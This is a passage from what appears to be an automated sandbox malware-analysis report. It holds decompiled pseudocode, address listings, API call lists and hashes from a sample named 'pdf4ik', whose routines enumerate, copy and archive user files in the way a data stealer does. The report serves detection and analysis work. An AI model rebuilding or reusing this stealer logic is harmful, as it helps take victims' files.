									if(_t326 == 0) {
										_t327 = _v1160;
										_t458 = _v1156;
										_t143 = _t327 + 0x1e; // 0x2f
										_t531 = _t458 + _t143;
										 *(_t407 + 0x18) =  *(_t407 + 0x18) + _t458 + _t143;
										__eflags =  *(_t407 + 0x14);
										if( *(_t407 + 0x14) == 0) {
											_t593 = _t407 + 0x30;
											 *((intOrPtr*)(_t407 + 0x34)) = 0x23456789;
											 *((intOrPtr*)(_t407 + 0x38)) = 0x34567890;
											_t408 =  *_t407;
											 *_t593 = 0x12345678;
											__eflags = _t408;
											if(_t408 != 0) {
												while(1) {
													__eflags =  *_t408;
													if( *_t408 == 0) {
														goto L46;
													}
													E29DABB00(_t593);
													_t408 = _t408 + 1;
													__eflags = _t408;
													if(_t408 != 0) {
														continue;
													}
													goto L46;
												}
											}
											L46:
											__eflags =  *0x29dd86e9;
											if( *0x29dd86e9 == 0) {
												_t388 = GetDesktopWindow();
												__eflags = _t388 ^ GetTickCount();
												E29DAFCE4(_t388 ^ GetTickCount());
												_t599 = _t599 + 4;
											}
											_t562 = 0;
											__eflags = 0;
											do {
												 *((char*)(_t598 + _t562 - 0x28)) = E29DAFCF6(__eflags) >> 7;
												_t562 = _t562 + 1;
												__eflags = _t562 - 0xc;
											} while (__eflags < 0);
											_t459 =  *_t593;
											_t532 = 0;
											__eflags = 0;
											_v33 = _v1176 >> 8;
											_t332 = _t593[8];
											_v1200 = 0;
											_v1196 = _t593[4];
											do {
												_t461 =  *(0x29dcd9b0 + (( *(_t598 + _t532 - 0x28) ^ _t459) & 0x000000ff) * 4) ^ _t459 >> 0x00000008;
												_t569 = 1 + ((_t461 & 0x000000ff) + _v1196) * 0x8088405;
												 *_t593 = _t461;
												_t593[4] = _t569;
												_t334 = _t332 >> 0x00000008 ^  *(0x29dcd9b0 + ((_t569 >> 0x00000018 ^ _t332) & 0x000000ff) * 4);
												_t412 = _v1200;
												_t593[8] = _t334;
												 *(_t598 + _t412 - 0x28) = ((_t332 & 0x0000fffd | 0x00000002) ^ 0x00000001) * (_t332 & 0x0000fffd | 0x00000002) >> 0x00000008 ^  *(_t598 + _t412 - 0x28);
												_t546 = _t412;
												_v1188 =  *(_t598 + _t546 - 0x27) & 0x000000ff;
												_v1200 = _t334 & 0x0000fffd | 0x00000002;
												_t421 =  *(0x29dcd9b0 + ((_v1188 ^ _t461) & 0x000000ff) * 4) ^ _t461 >> 0x00000008;
												_t466 = 1 + ((_t421 & 0x000000ff) + _t569) * 0x8088405;
												 *_t593 = _t421;
												_v1196 = _t421;
												_t593[4] = _t466;
												_t574 = _t334 >> 0x00000008 ^  *(0x29dcd9b0 + ((_t466 >> 0x00000018 ^ _t334) & 0x000000ff) * 4);
												 *(_t598 + _t546 - 0x27) = (_v1200 ^ 0x00000001) * _v1200 >> 0x00000008 ^ _v1188;
												_t427 =  *(_t598 + _t546 - 0x26);
												_v1188 = _t427;
												_v1200 = _t574 & 0x0000fffd | 0x00000002;
												_t341 = _v1196;
												_v1196 = _t341 >> 8;
												_t593[8] = _t574;
												_t344 =  *(0x29dcd9b0 + ((_t427 ^ _t341) & 0x000000ff) * 4) ^ _v1196;
												_v1196 = _t344;
												 *_t593 = _t344;
												_t348 = 1 + ((_t344 & 0x000000ff) + _t466) * 0x8088405;
												_t593[4] = _t348;
												_t576 = _t574 >> 0x00000008 ^  *(0x29dcd9b0 + ((_t348 >> 0x00000018 ^ _t574) & 0x000000ff) * 4);
												 *(_t598 + _t546 - 0x26) = (_v1200 ^ 0x00000001) * _v1200 >> 0x00000008 ^ _v1188;
												_t436 =  *((intOrPtr*)(_t598 + _t546 - 0x25));
												_v1188 = _t436;
												_v1200 = _t576 & 0x0000fffd | 0x00000002;
												_t475 = _v1196;
												_t593[8] = _t576;
												_v1196 = _t475 >> 8;
												_t459 =  *(0x29dcd9b0 + ((_t436 ^ _t475) & 0x000000ff) * 4) ^ _v1196;
												_t532 = _t546 + 4;
												_t351 = 1 + (_t348 + (_t459 & 0x000000ff)) * 0x8088405;
												_t593[4] = _t351;
												_v1196 = _t351;
												 *_t593 = _t459;
												_t332 = _t576 >> 0x00000008 ^  *(0x29dcd9b0 + ((_t351 >> 0x00000018 ^ _t576) & 0x000000ff) * 4);
												_t593[8] = _t332;
												 *(_t598 + _t532 - 0x29) = (_v1200 ^ 0x00000001) * _v1200 >> 0x00000008 ^ _v1188;
												_v1200 = _t532;
												__eflags = _t532 - 0xc;
											} while (_t532 < 0xc);
											_t407 = _v1212;
											_t587 = 0;
											__eflags =  *_t407;
											if( *_t407 == 0) {
												L58:
												_t355 = 0;
												__eflags = 0;
											} else {
												__eflags = _v1189;
												if(_v1189 == 0) {
													_t506 =  &_v44;
													_t459 = _t407;
													E29DABF80(_t407,  &_v44, 0xc);
													_t230 = _t407 + 0x18;
													 *_t230 =  *(_t407 + 0x18) + 0xc;
													__eflags =  *_t230;
												}
												__eflags =  *_t407 - _t587;
												if( *_t407 == _t587) {
													goto L58;
												} else {
													__eflags = _v1189;
													if(_v1189 != 0) {
														goto L58;
													} else {
														_t355 = 1;
													}
												}
											}
											__eflags = _v1189;
											 *((char*)(_t407 + 0x2d)) = _t355;
											if(_v1189 != 0) {
												 *(_t407 + 0x90) = _t587;
											} else {
												_t383 = _v1204;
												__eflags = _t383 - 8;
												if(_t383 != 8) {
													__eflags = _t383 - _t587;
													if(__eflags == 0) {
														_t587 = E29DAC7D0(_t459, _t407, __eflags);
													}
												} else {
													_t587 = E29DAC6C0(_t459, _t407,  &_v1184);
												}
											}
											__eflags =  *((char*)(_t407 + 0x80));
											 *((char*)(_t407 + 0x2d)) = 0;
											if( *((char*)(_t407 + 0x80)) != 0) {
												_t381 =  *(_t407 + 0x7c);
												__eflags = _t381;
												if(_t381 != 0) {
													CloseHandle(_t381);
												}
											}
											_t478 =  *(_t407 + 0x90);
											_t302 =  *(_t407 + 0x14);
											_t552 =  *((intOrPtr*)(_t407 + 0x74));
											 *(_t407 + 0x18) =  *(_t407 + 0x18) + _t478;
											 *(_t407 + 0x7c) = 0;
											 *((intOrPtr*)(_t407 + 0x70)) = _t552;
											__eflags =  *(_t407 + 0x14);
											if( *(_t407 + 0x14) != 0) {
												goto L92;
											} else {
												__eflags = _t587;
												if(_t587 != 0) {
													goto L40;
												} else {
													_t358 = _v1208 + _t478;
													__eflags = _v1168 - _t358;
													_t532 =  *(_t407 + 0x78);
													_t481 = _t478 & 0xffffff00 | _v1168 == _t358;
													__eflags =  *((char*)(_t407 + 0x1c));
													_v1172 =  *(_t407 + 0x78);
													_v1168 = _t358;
													_v1164 = _t552;
													if( *((char*)(_t407 + 0x1c)) == 0) {
														L79:
														_t359 = _v1204;
														__eflags = _v1178 - _t359;
														if(_v1178 == _t359) {
															__eflags = _t359;
															if(__eflags != 0) {
																L83:
																_t587 = _t407;
																_t552 =  &_v1184;
																_t360 = E29DAB310(_t481,  &_v1184, _t407, __eflags);
																__eflags = _t360;
																if(_t360 != 0) {
																	goto L40;
																} else {
																	_t278 = _t407 + 0x18;
																	 *_t278 =  *(_t407 + 0x18) + 0x10;
																	__eflags =  *_t278;
																	_v1180 = _v1140;
																	goto L85;
																}
															} else {
																__eflags = _t481;
																if(__eflags == 0) {
																	goto L80;
																} else {
																	goto L83;
																}
															}
														} else {
															L80:
															__eflags = _v12 ^ _t598;
															return E29DADF46(0x4000000, _t407, _v12 ^ _t598, _t532, _t552, _t587);
														}
													} else {
														__eflags =  *_t407 - _t587;
														if( *_t407 == _t587) {
															L73:
															__eflags = _v1180 & 0x00000001;
															_v1178 = _v1204;
															if((_v1180 & 0x00000001) == 0) {
																_t481 = 0xfff7;
																_t264 =  &_v1180;
																 *_t264 = _v1180 & 0x0000fff7;
																__eflags =  *_t264;
															}
															_v1140 = _v1180;
															_t532 = _v1132 -  *((intOrPtr*)(_t407 + 0x10));
															__eflags = E29DAC0E0(_t407, _v1132 -  *((intOrPtr*)(_t407 + 0x10)));
															if(__eflags == 0) {
																L78:
																__eflags = _v12 ^ _t598;
																return E29DADF46(0x2000000, _t407, _v12 ^ _t598, _t532, _t552, _t587);
															} else {
																_t587 = _t407;
																_t552 =  &_v1184;
																_t378 = E29DAB070(_t481,  &_v1184, _t407, __eflags);
																__eflags = _t378;
																if(_t378 != 0) {
																	goto L40;
																} else {
																	_t506 =  *(_t407 + 0x18);
																	_t380 = E29DAC0E0(_t407,  *(_t407 + 0x18));
																	__eflags = _t380;
																	if(_t380 != 0) {
																		L85:
																		_t302 =  *(_t407 + 0x14);
																		__eflags =  *(_t407 + 0x14);
																		if(__eflags != 0) {
																			goto L92;
																		} else {
																			_t362 = E29DAE70E(_t407, _t532, _t552, _t587, __eflags, _v1152);
																			_t548 = _v1152;
																			_t594 = _t362;
																			E29DB0010(_t594, _v864, _v1152);
																			_v864 = _t594;
																			_t365 = E29DAE70E(_t407, _v1152, _t552, _t594, __eflags, 0x360);
																			_t595 =  &_v1184;
																			_t366 = memcpy(_t365, _t595, 0xd8 << 2);
																			_t582 = _t595 + 0x1b0;
																			_t485 =  *(_t407 + 0x44);
																			__eflags = _t485;
																			if(_t485 != 0) {
																				__eflags =  *(_t485 + 0x35c);
																				while( *(_t485 + 0x35c) != 0) {
																					_t485 =  *(_t485 + 0x35c);
																					__eflags =  *(_t485 + 0x35c);
																				}
																				 *(_t485 + 0x35c) = _t366;
																				__eflags = _v12 ^ _t598;
																				return E29DADF46(0, _t407, _v12 ^ _t598, _t548, _t582, _t595);
																			} else {
																				 *(_t407 + 0x44) = _t366;
																				__eflags = _v12 ^ _t598;
																				return E29DADF46(0, _t407, _v12 ^ _t598, _t548, _t582, _t595);
																			}
																		}
																	} else {
																		goto L78;
																	}
																}
															}
														} else {
															__eflags = _v1189;
															if(_v1189 == 0) {
																goto L79;
															} else {
																goto L73;
															}
														}
													}
												}
											}
										} else {
											E29DAC660(_t592);
											__eflags = _v12 ^ _t598;
											return E29DADF46( *(_t407 + 0x14), _t407, _v12 ^ _t598, _t531,  &_v1184, _t592);
										}
									} else {
										E29DAC660(_t592);
										L40:
										__eflags = _v12 ^ _t598;
										return E29DADF46(0x400, _t407, _v12 ^ _t598, _t532, _t552, _t587);
									}
								}
							}
						}
					} else {
						__eflags = _v12 ^ _t598;
						return E29DADF46(0x50000, __ecx, _v12 ^ _t598, __edx, _t552, __edx);
					}
				} else {
					return E29DADF46(0x40000, __ecx, _v12 ^ _t598, __edx, _t552, __edx);
				}
			}

























































































































                                        0x29dac840
                                        0x29dac849
                                        0x29dac850
                                        0x29dac853
                                        0x29dac858
                                        0x29dac85f
                                        0x29dac862
                                        0x29dac868
                                        0x29dac86a
                                        0x29dac884
                                        0x29dac888
                                        0x29dac8a2
                                        0x29dac8a5
                                        0x29dac8af
                                        0x29dac8b1
                                        0x29dac8b4
                                        0x29dac8b6
                                        0x29dac8b6
                                        0x29dac8b4
                                        0x29dac8c8
                                        0x29dac8ce
                                        0x29dac8d5
                                        0x29dad13b
                                        0x29dad13b
                                        0x00000000
                                        0x29dac8db
                                        0x29dac8db
                                        0x29dac8e1
                                        0x29dac8e1
                                        0x29dac8e4
                                        0x29dac8e6
                                        0x29dac8e6
                                        0x29dac8e9
                                        0x29dac8ea
                                        0x29dac8ea
                                        0x29dac8ef
                                        0x29dac8f2
                                        0x29dac8f5
                                        0x29dac8fb
                                        0x29dac8fd
                                        0x29dac922
                                        0x29dac922
                                        0x29dac8ff
                                        0x29dac8ff
                                        0x29dac905
                                        0x29dac905
                                        0x29dac908
                                        0x29dac908
                                        0x29dac90a
                                        0x29dac90b
                                        0x29dac90b
                                        0x29dac90f
                                        0x29dac911
                                        0x29dac919
                                        0x29dac920
                                        0x00000000
                                        0x00000000
                                        0x29dac920
                                        0x29dac929
                                        0x29dac933
                                        0x29dac935
                                        0x29dac946
                                        0x29dac946
                                        0x29dac937
                                        0x29dac937
                                        0x29dac93d
                                        0x29dac942
                                        0x29dac944
                                        0x00000000
                                        0x00000000
                                        0x29dac944
                                        0x29dac950
                                        0x29dac953
                                        0x29dac956
                                        0x29dac963
                                        0x29dac966
                                        0x29dac975
                                        0x29dac978
                                        0x29dac989
                                        0x29dac98c
                                        0x00000000
                                        0x29dac992
                                        0x29dac994
                                        0x00000000
                                        0x29dac994
                                        0x29dac97a
                                        0x29dac97a
                                        0x29dac982
                                        0x00000000
                                        0x29dac982
                                        0x29dac968
                                        0x29dac96e
                                        0x00000000
                                        0x29dac96e
                                        0x29dac958
                                        0x29dac95c
                                        0x29dac999
                                        0x29dac999
                                        0x29dac99b
                                        0x29dac99d
                                        0x29dad140
                                        0x29dad145
                                        0x29dad150
                                        0x29dac9a3
                                        0x29dac9af
                                        0x29dac9b5
                                        0x29dac9c9
                                        0x29dac9d6
                                        0x29dac9dc
                                        0x29dac9e3
                                        0x29dac9e9
                                        0x29dac9f7
                                        0x29dac9fd
                                        0x29dac9fd
                                        0x29dac9fd
                                        0x29dac9fd
                                        0x29daca0f
                                        0x29daca17
                                        0x29daca21
                                        0x29daca27
                                        0x29daca2c
                                        0x29daca32
                                        0x29daca38
                                        0x29daca42
                                        0x29daca48
                                        0x29daca52
                                        0x29daca58
                                        0x29daca5f
                                        0x29daca61
                                        0x29daca63
                                        0x29daca6a
                                        0x29daca6c
                                        0x29daca71
                                        0x29daca71
                                        0x29daca6a
                                        0x29daca78
                                        0x29daca7f
                                        0x29daca85
                                        0x29daca8c
                                        0x29daca8e
                                        0x29dacaa5
                                        0x29dacaa5
                                        0x29daca90
                                        0x29daca90
                                        0x29daca93
                                        0x29daca95
                                        0x00000000
                                        0x29daca97
                                        0x29daca9d
                                        0x29daca9d
                                        0x29daca95
                                        0x29dacab1
                                        0x29dacab4
                                        0x29dacac2
                                        0x29dacacc
                                        0x29dacacf
                                        0x29dacad6
                                        0x29dacadf
                                        0x29dacae5
                                        0x29dacaed
                                        0x29dacafe
                                        0x29dacb0e
                                        0x29dacb11
                                        0x29dacb16
                                        0x29dacb19
                                        0x29dacb20
                                        0x29dacb2b
                                        0x29dacb39
                                        0x29dacb3e
                                        0x29dacb4b
                                        0x29dacb51
                                        0x29dacb54
                                        0x29dacb5f
                                        0x29dacb6d
                                        0x29dacb76
                                        0x29dacb80
                                        0x29dacb83
                                        0x29dacb87
                                        0x29dacb90
                                        0x29dacb93
                                        0x29dacb9b
                                        0x29dacba5
                                        0x29dacbaf
                                        0x29dacbb2
                                        0x29dacbb5
                                        0x29dacbb8
                                        0x29dacbbc
                                        0x29dacbc1
                                        0x29dacbc3
                                        0x29dacbe2
                                        0x29dacbe8
                                        0x29dacbee
                                        0x29dacbee
                                        0x29dacbf2
                                        0x29dacbf5
                                        0x29dacbf9
                                        0x29dacc16
                                        0x29dacc19
                                        0x29dacc20
                                        0x29dacc27
                                        0x29dacc29
                                        0x29dacc2f
                                        0x29dacc31
                                        0x29dacc33
                                        0x29dacc35
                                        0x29dacc37
                                        0x00000000
                                        0x00000000
                                        0x29dacc3b
                                        0x29dacc40
                                        0x29dacc40
                                        0x29dacc41
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dacc41
                                        0x29dacc33
                                        0x29dacc43
                                        0x29dacc43
                                        0x29dacc4a
                                        0x29dacc4c
                                        0x29dacc5a
                                        0x29dacc5d
                                        0x29dacc62
                                        0x29dacc62
                                        0x29dacc65
                                        0x29dacc65
                                        0x29dacc67
                                        0x29dacc6f
                                        0x29dacc73
                                        0x29dacc74
                                        0x29dacc74
                                        0x29dacc82
                                        0x29dacc87
                                        0x29dacc87
                                        0x29dacc89
                                        0x29dacc8c
                                        0x29dacc8f
                                        0x29dacc95
                                        0x29dacc9b
                                        0x29daccb6
                                        0x29daccd2
                                        0x29daccdd
                                        0x29daccdf
                                        0x29dacce8
                                        0x29daccf7
                                        0x29dacd04
                                        0x29dacd07
                                        0x29dacd0b
                                        0x29dacd12
                                        0x29dacd23
                                        0x29dacd42
                                        0x29dacd4f
                                        0x29dacd50
                                        0x29dacd5c
                                        0x29dacd68
                                        0x29dacd72
                                        0x29dacd8d
                                        0x29dacd91
                                        0x29dacd9d
                                        0x29dacda3
                                        0x29dacda9
                                        0x29dacdbd
                                        0x29dacdc3
                                        0x29dacdcd
                                        0x29dacdd3
                                        0x29dacdd9
                                        0x29dacde6
                                        0x29dacdee
                                        0x29dacdfa
                                        0x29dace1a
                                        0x29dace1e
                                        0x29dace22
                                        0x29dace34
                                        0x29dace3a
                                        0x29dace4b
                                        0x29dace4e
                                        0x29dace5b
                                        0x29dace61
                                        0x29dace6f
                                        0x29dace70
                                        0x29dace73
                                        0x29dace86
                                        0x29dace8f
                                        0x29dacea8
                                        0x29daceab
                                        0x29daceaf
                                        0x29daceb5
                                        0x29daceb5
                                        0x29dacebe
                                        0x29dacec4
                                        0x29dacec6
                                        0x29dacec8
                                        0x29dacef8
                                        0x29dacef8
                                        0x29dacef8
                                        0x29daceca
                                        0x29daceca
                                        0x29daced1
                                        0x29daced5
                                        0x29daced9
                                        0x29dacedb
                                        0x29dacee0
                                        0x29dacee0
                                        0x29dacee0
                                        0x29dacee0
                                        0x29dacee4
                                        0x29dacee6
                                        0x00000000
                                        0x29dacee8
                                        0x29dacee8
                                        0x29daceef
                                        0x00000000
                                        0x29dacef1
                                        0x29dacef1
                                        0x29dacef1
                                        0x29daceef
                                        0x29dacee6
                                        0x29dacefa
                                        0x29dacf01
                                        0x29dacf04
                                        0x29dacf32
                                        0x29dacf06
                                        0x29dacf06
                                        0x29dacf0c
                                        0x29dacf0f
                                        0x29dacf23
                                        0x29dacf25
                                        0x29dacf2e
                                        0x29dacf2e
                                        0x29dacf11
                                        0x29dacf1f
                                        0x29dacf1f
                                        0x29dacf0f
                                        0x29dacf38
                                        0x29dacf3f
                                        0x29dacf43
                                        0x29dacf45
                                        0x29dacf48
                                        0x29dacf4a
                                        0x29dacf4d
                                        0x29dacf4d
                                        0x29dacf4a
                                        0x29dacf53
                                        0x29dacf59
                                        0x29dacf5c
                                        0x29dacf5f
                                        0x29dacf62
                                        0x29dacf69
                                        0x29dacf6c
                                        0x29dacf6e
                                        0x00000000
                                        0x29dacf74
                                        0x29dacf74
                                        0x29dacf76
                                        0x00000000
                                        0x29dacf7c
                                        0x29dacf82
                                        0x29dacf85
                                        0x29dacf8b
                                        0x29dacf8e
                                        0x29dacf91
                                        0x29dacf95
                                        0x29dacf9b
                                        0x29dacfa1
                                        0x29dacfa7
                                        0x29dad03e
                                        0x29dad03e
                                        0x29dad044
                                        0x29dad04b
                                        0x29dad065
                                        0x29dad067
                                        0x29dad06d
                                        0x29dad06d
                                        0x29dad06f
                                        0x29dad075
                                        0x29dad07a
                                        0x29dad07c
                                        0x00000000
                                        0x29dad082
                                        0x29dad089
                                        0x29dad089
                                        0x29dad089
                                        0x29dad08d
                                        0x00000000
                                        0x29dad08d
                                        0x29dad069
                                        0x29dad069
                                        0x29dad06b
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dad06b
                                        0x29dad04d
                                        0x29dad04d
                                        0x29dad058
                                        0x29dad062
                                        0x29dad062
                                        0x29dacfad
                                        0x29dacfad
                                        0x29dacfaf
                                        0x29dacfbe
                                        0x29dacfbe
                                        0x29dacfcc
                                        0x29dacfd3
                                        0x29dacfd5
                                        0x29dacfda
                                        0x29dacfda
                                        0x29dacfda
                                        0x29dacfda
                                        0x29dacfe8
                                        0x29dacff5
                                        0x29dacfff
                                        0x29dad001
                                        0x29dad026
                                        0x29dad031
                                        0x29dad03b
                                        0x29dad003
                                        0x29dad003
                                        0x29dad005
                                        0x29dad00b
                                        0x29dad010
                                        0x29dad012
                                        0x00000000
                                        0x29dad018
                                        0x29dad018
                                        0x29dad01d
                                        0x29dad022
                                        0x29dad024
                                        0x29dad094
                                        0x29dad094
                                        0x29dad097
                                        0x29dad099
                                        0x00000000
                                        0x29dad09f
                                        0x29dad0a6
                                        0x29dad0ab
                                        0x29dad0b4
                                        0x29dad0bf
                                        0x29dad0cc
                                        0x29dad0d2
                                        0x29dad0dc
                                        0x29dad0e4
                                        0x29dad0e4
                                        0x29dad0e6
                                        0x29dad0ec
                                        0x29dad0ee
                                        0x29dad108
                                        0x29dad10f
                                        0x29dad111
                                        0x29dad117
                                        0x29dad117
                                        0x29dad120
                                        0x29dad12e
                                        0x29dad138
                                        0x29dad0f0
                                        0x29dad0f0
                                        0x29dad0fb
                                        0x29dad105
                                        0x29dad105
                                        0x29dad0ee
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dad024
                                        0x29dad012
                                        0x29dacfb1
                                        0x29dacfb1
                                        0x29dacfb8
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29dacfb8
                                        0x29dacfaf
                                        0x29dacfa7
                                        0x29dacf76
                                        0x29dacbfb
                                        0x29dacbfb
                                        0x29dacc09
                                        0x29dacc13
                                        0x29dacc13
                                        0x29dacbc5
                                        0x29dacbc5
                                        0x29dacbca
                                        0x29dacbd5
                                        0x29dacbdf
                                        0x29dacbdf
                                        0x29dacbc3
                                        0x29dac99d
                                        0x29dac956
                                        0x29dac88a
                                        0x29dac895
                                        0x29dac89f
                                        0x29dac89f
                                        0x29dac86c
                                        0x29dac881
                                        0x29dac881

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: /$UT
                                        • API String ID: 0-1626504983
                                        • Opcode ID: 7f64c2ae4b6e8a2c89bc7a6cd02578be3cc12a531d3320d3402f898ada034343
                                        • Instruction ID: db2866c6731c9aa878440052262d416d49c561fe4fb28ed16219066e2bdabb4c
                                        • Opcode Fuzzy Hash: 7f64c2ae4b6e8a2c89bc7a6cd02578be3cc12a531d3320d3402f898ada034343
                                        • Instruction Fuzzy Hash: 0242E8B1A002598FCB24CF78C88039EBBB1EF95310F1484EED949A7741DB349A96DF65
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D9B960 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 166fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 29D9B9B2
                                        • FindFirstFileA.KERNEL32(?,?), ref: 29D9B9C9
                                        • StrCmpCA.SHLWAPI(?,29DCFAAC), ref: 29D9B9EC
                                        • StrCmpCA.SHLWAPI(?,29DCFAB0), ref: 29D9BA06
                                        • wsprintfA.USER32 ref: 29D9BA2E
                                        • StrCmpCA.SHLWAPI(?,015A4C58), ref: 29D9BA45
                                        • StrCmpCA.SHLWAPI(?,015A2ED8), ref: 29D9BA93
                                          • Part of subcall function 29D9ACA0: _memset.LIBCMT ref: 29D9ACDC
                                          • Part of subcall function 29D9ACA0: lstrcatA.KERNEL32(?,015A1F98,?,?,29DCD617), ref: 29D9ACF2
                                          • Part of subcall function 29D9ACA0: _malloc.LIBCMT ref: 29D9ACFA
                                          • Part of subcall function 29D9ACA0: GetTickCount.KERNEL32 ref: 29D9AD07
                                          • Part of subcall function 29D9ACA0: _rand.LIBCMT ref: 29D9AD20
                                          • Part of subcall function 29D9ACA0: wsprintfA.USER32 ref: 29D9AD35
                                          • Part of subcall function 29D9ACA0: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9AD4D
                                          • Part of subcall function 29D9ACA0: CopyFileA.KERNEL32(?,?,00000001), ref: 29D9AD5D
                                          • Part of subcall function 29D9ACA0: _memset.LIBCMT ref: 29D9AD70
                                          • Part of subcall function 29D9ACA0: lstrcatA.KERNEL32(?,29DCD7BC,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9AD84
                                          • Part of subcall function 29D9ACA0: lstrcatA.KERNEL32(?,015A1A80,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9AD97
                                          • Part of subcall function 29D9ACA0: lstrcatA.KERNEL32(?,29DCD7BC,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9ADA9
                                          • Part of subcall function 29D9ACA0: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9ADBD
                                          • Part of subcall function 29D9ACA0: lstrcatA.KERNEL32(?,29DCFF1C,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9ADCF
                                          • Part of subcall function 29D9ACA0: lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9ADE3
                                          • Part of subcall function 29D9ACA0: lstrcatA.KERNEL32(?,.txt,?,?,?,?,?,?,?,?,?,?,?,29DCD617), ref: 29D9ADF5
                                        • FindNextFileA.KERNEL32(?,?), ref: 29D9BB7C
                                        • FindClose.KERNEL32(?), ref: 29D9BB91
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileFindwsprintf$_memset$CloseCopyCountFirstNextTick_malloc_rand
                                        • String ID: %s\%s$%s\*
                                        • API String ID: 4056001293-2848263008
                                        • Opcode ID: 0ede09a674c177fde73e7242e8edd5391fcc306d4b39c4fd0c24895e9cea7ca8
                                        • Instruction ID: 0c2e3f5bd1221839eda70c2a155e8ff906fe0736ccd0116c9e76dd60e01f30df
                                        • Opcode Fuzzy Hash: 0ede09a674c177fde73e7242e8edd5391fcc306d4b39c4fd0c24895e9cea7ca8
                                        • Instruction Fuzzy Hash: CB5140B2910218ABDB29EF54DC85EEAB3BDBF44B04F0481DDE50AA3144E6349B45DF60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D9C6C0 Relevance: 21.5, APIs: 14, Instructions: 531stringCOMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 60%
                                        			E29D9C6C0(intOrPtr _a4) {
				char _v8;
				char _v16;
				signed int _v24;
				char _v1024;
				void* _v2024;
				char _v3024;
				void* _v4024;
				char _v4032;
				intOrPtr _v4036;
				void* _v4040;
				char _v4052;
				intOrPtr _v4060;
				char _v4064;
				char _v4080;
				intOrPtr _v4088;
				char _v4092;
				char _v4108;
				intOrPtr _v4116;
				char _v4120;
				char _v4136;
				intOrPtr _v4144;
				char _v4148;
				char _v4164;
				intOrPtr _v4172;
				char _v4176;
				char _v4192;
				intOrPtr _v4200;
				char _v4220;
				intOrPtr _v4224;
				intOrPtr _v4232;
				intOrPtr _v4236;
				void* _v4240;
				intOrPtr _v4244;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t191;
				signed int _t192;
				signed int _t197;
				CHAR* _t211;
				CHAR* _t223;
				intOrPtr _t227;
				intOrPtr* _t228;
				intOrPtr _t233;
				void* _t241;
				void* _t243;
				void* _t247;
				intOrPtr _t248;
				intOrPtr* _t249;
				void* _t270;
				void* _t272;
				void* _t276;
				intOrPtr _t277;
				intOrPtr* _t278;
				void* _t288;
				char _t289;
				void* _t290;
				signed int _t299;
				void* _t300;
				CHAR* _t305;
				CHAR* _t309;
				char* _t310;
				char _t312;
				intOrPtr _t313;
				CHAR* _t321;
				intOrPtr* _t325;
				CHAR* _t331;
				intOrPtr* _t335;
				CHAR _t347;
				CHAR* _t348;
				void* _t349;
				void* _t363;
				void* _t366;
				char* _t367;
				short* _t368;
				short* _t369;
				void* _t370;
				signed int _t373;
				signed int _t378;
				void* _t380;
				void* _t381;
				intOrPtr _t382;
				intOrPtr* _t383;
				short* _t384;
				void* _t385;
				intOrPtr _t386;
				intOrPtr _t387;
				signed int _t388;
				void* _t389;
				void* _t390;
				char* _t395;
				char* _t396;

				E29DBCDB0(0x1088);
				_t191 =  *0x29dd5664; // 0xd9555f04
				_t192 = _t191 ^ _t388;
				_v24 = _t192;
				 *[fs:0x0] =  &_v16;
				_t289 = 0;
				_v4244 = _a4;
				E29DB5640( &_v4024, 0, 0x3e8);
				_t390 = _t389 + 0xc;
				_t299 = 0 |  *0x29dd8500(0, 0x1a, 0, 0,  &_v4024, _t192, _t363, _t380, _t288,  *[fs:0x0], E29DC3275, 0xffffffff) < 0x00000000;
				_v4172 = 0xf;
				_v4176 = 0;
				_v4192 = 0;
				_t13 = _t299 - 1; // -1
				_t365 = _t13 &  &_v4024;
				_t197 = _t13 &  &_v4024;
				_t14 = _t197 + 1; // 0x0
				_t381 = _t14;
				goto L1;
				do {
					L3:
					_t347 =  *_t223;
					_t223 = _t223 + 1;
					_t408 = _t347;
				} while (_t347 != 0);
				_t348 =  &_v1024;
				E29D892C0(_t310, _t348, _t223 - _t366);
				E29DA4C40( &_v4240, _t408);
				_v8 = 1;
				_t227 = _v4236;
				_t312 = _v4240;
				_v4224 = _t227;
				_t382 = _t312;
				if(_t312 == _t227) {
					L27:
					_t396 = _t395 - 0x1c;
					_t367 = _t396;
					_t228 =  &_v3024;
					 *((intOrPtr*)(_t367 + 0x14)) = 0xf;
					 *((intOrPtr*)(_t367 + 0x10)) = _t289;
					_v4224 = _t396;
					 *_t367 = _t289;
					_t349 = _t228 + 1;
					do {
						_t313 =  *_t228;
						_t228 = _t228 + 1;
						_t420 = _t313 - _t289;
					} while (_t313 != _t289);
					_t350 =  &_v3024;
					E29D892C0(_t367, _t350, _t228 - _t349);
					_t383 = E29DA4C40( &_v4040, _t420);
					if( &_v4240 != _t383) {
						_t262 = _v4240;
						if(_v4240 != _t289) {
							E29D97AC0(_t262, _v4236);
							_push(_v4240);
